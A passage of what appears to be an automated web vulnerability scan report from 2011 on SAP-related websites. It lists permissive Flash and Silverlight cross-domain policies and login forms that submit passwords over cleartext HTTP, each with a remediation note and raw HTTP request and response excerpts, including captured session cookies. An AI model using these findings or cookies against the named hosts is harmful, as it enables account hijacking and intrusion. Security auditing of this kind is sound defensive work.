<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
   <allow-access-from domain="www.phunt.dev2439.facebook.com" />
...[SNIP]...

4.13. http://www.sap.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sap.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/xml
Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT
Accept-Ranges: bytes
ETag: "66f151c654c1cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:47 GMT
Connection: close
Content-Length: 765

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sap.com"/>
   <allow-access-from domain="*.vcopious.com"/>
   <allow-access-from domain="*.sapphirenow.com"/>
   <allow-access-from domain="www.sapphirenow.com"/>
   <allow-access-from domain="virtualevents.sap.com"/>
   <allow-access-from domain="virtualevents1.sap.com"/>
   <allow-access-from domain="virtualevents2.sap.com"/>
   <allow-access-from domain="www.virtualevents.sap.com"/>
   <allow-access-from domain="www.sapconfigurator.com"/>
   <allow-access-from domain="*.sapvirtualevents.com"/>
   <allow-access-from domain="*.sappartnerkickoff.com"/>
...[SNIP]...

4.14. https://www.sap.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sap.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/xml
Last-Modified: Mon, 31 Jan 2011 14:40:15 GMT
Accept-Ranges: bytes
ETag: "66f151c654c1cb1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:29 GMT
Connection: close
Content-Length: 765

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sap.com"/>
   <allow-access-from domain="*.vcopious.com"/>
   <allow-access-from domain="*.sapphirenow.com"/>
   <allow-access-from domain="www.sapphirenow.com"/>
   <allow-access-from domain="virtualevents.sap.com"/>
   <allow-access-from domain="virtualevents1.sap.com"/>
   <allow-access-from domain="virtualevents2.sap.com"/>
   <allow-access-from domain="www.virtualevents.sap.com"/>
   <allow-access-from domain="www.sapconfigurator.com"/>
   <allow-access-from domain="*.sapvirtualevents.com"/>
   <allow-access-from domain="*.sappartnerkickoff.com"/>
...[SNIP]...

4.15. http://www.sapphirenow.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapphirenow.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/xml
Date: Sat, 15 Oct 2011 14:23:03 GMT
Accept-Ranges: bytes
ETag: "fce0a340e329cc1:0"
Connection: close
Last-Modified: Mon, 13 Jun 2011 16:02:10 GMT
X-Powered-By: ASP.NET
Content-Length: 331

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vcopious.com"/>
<allow-access-from domain="*.sapphirenow.com"/>
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://omnituremarketing.d1.sc.omtrdc.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.d1.sc.omtrdc.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
xserver: www337
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.2. http://sap.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: sap.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://static.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: static.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 14:24:55 GMT
Expires: Sun, 16 Oct 2011 14:24:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 12 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://www.asugonline.com/cms/FormBuilder/Register.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /cms/FormBuilder/Register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /cms/FormBuilder/Register.aspx?EventId=12&popupTitle=Register%20Yourself&popupWidth=800&popupHeight=500&formtypeid=1 HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.asugonline.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:27:46 GMT
Content-Length: 22076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
<body class="body" style=" margin: 0px" >
<form name="form1" method="post" action="Register.aspx?EventId=12&amp;popupTitle=Register+Yourself&amp;popupWidth=800&amp;popupHeight=500&amp;formtypeid=1" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<td width="35%" style="Padding: 0px 0px 0px 15px;"><input name="DynamicFormControl1$ctrlPassword105" type="password" id="DynamicFormControl1_ctrlPassword105" class="textbox" /></td>
...[SNIP]...

6.2. http://www.sapbusinessoptimizer.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
</ul>
   
   <form onsubmit="Login.submit('mini');" action="javascript:void(0);">
       <div class="field">
...[SNIP]...
</label>
           <input type="password" name="Password" id="mini_pass" class="text" value="Password" />
       </div>
...[SNIP]...

6.3. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<body>
<form name="form1" method="post" action="login.aspx?ReturnUrl=%2fdefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" style="height: 300px;">
<div>
...[SNIP]...
<div class="email-container">
<input name="userLogin1$txtPassword" type="password" id="userLogin1_txtPassword" class="text-field" />
<span id="userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...

6.4. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/teched/login.aspx?eventid=1&amp;languageid=1&amp;ReturnUrl=default.aspx%3feventname%3dteched%26" style="height: 300px;" id="aspnetForm"><div>
...[SNIP]...
<div class="email-container">
<input name="ctl00$ContentPlaceHolder1$userLogin1$txtPassword" type="password" id="ctl00_ContentPlaceHolder1_userLogin1_txtPassword" class="text-field" />
<span id="ctl00_ContentPlaceHolder1_userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...

6.5. http://www.sdn.sap.com/irj/scn/advancedsearch  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28741
Date: Sat, 15 Oct 2011 14:59:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.6. http://www.sdn.sap.com/irj/scn/downloads  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/downloads

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/downloads HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.7. http://www.sdn.sap.com/irj/scn/index  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/index HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 58094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.8. http://www.sdn.sap.com/irj/scn/logon  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.9. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/sdnweblogs/popularposts

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/sdnweblogs/popularposts HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/26917
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; PortalAlias=scn; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; 